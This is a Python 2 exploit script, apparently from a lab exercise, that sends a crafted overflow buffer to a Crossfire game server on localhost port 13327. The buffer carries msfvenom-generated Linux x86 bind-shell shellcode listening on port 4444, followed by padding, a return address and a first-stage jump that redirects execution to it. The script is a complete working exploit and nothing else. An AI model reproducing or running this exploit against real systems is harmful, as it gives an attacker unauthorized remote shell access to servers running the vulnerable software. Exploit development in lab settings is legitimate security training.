crossfirexploit.py

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 13327))

first_stage = '\x83\xc0\x0c\xff\xe0'
return_address = '\x97\x45\x13\x08'

#msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b '\x00\x0a\x0d\x20'
#No platform was selected, choosing Msf::Module::Platform::Linux from the payload
#No Arch selected, selecting Arch: x86 from the payload
#Found 10 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 105 (iteration=0)
#x86/shikata_ga_nai chosen with final size 105
#Payload size: 105 bytes
#Final size of c file: 465 bytes

payload = (
"\xba\xa3\x97\xf1\x5e\xdb\xc3\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x14\x31\x53\x14\x83\xeb\xfc\x03\x53\x10\x41\x62\xc0\x85\x72"
"\x6e\x70\x79\x2f\x1b\x75\xf4\x2e\x6b\x1f\xcb\x30\xd7\xbe\x81"
"\x58\xea\x3e\x37\xc4\x80\x2e\x66\xa4\xdd\xae\xe2\x22\x86\xfd"
"\x73\x23\x77\xfa\xc0\x37\xc8\x64\xea\xb7\x6b\xd9\x92\x7a\xeb"
"\x8a\x02\xee\xd3\xf4\x79\x6e\x62\x7c\x7a\x06\x5a\x51\x09\xbe"
"\xcc\x82\x8f\x57\x63\x54\xac\xf7\x28\xef\xd2\x47\xc5\x22\x94"
)


buffer = '\x11(setup sound '
buffer += payload
buffer += 'A' *(4368-105)
buffer += return_address
buffer += first_stage
buffer += 'C' *(4379 - 4368-4-5)
buffer += '\x90\x00#'

s.send(buffer)
data = s.recv(1024)
print data

s.close()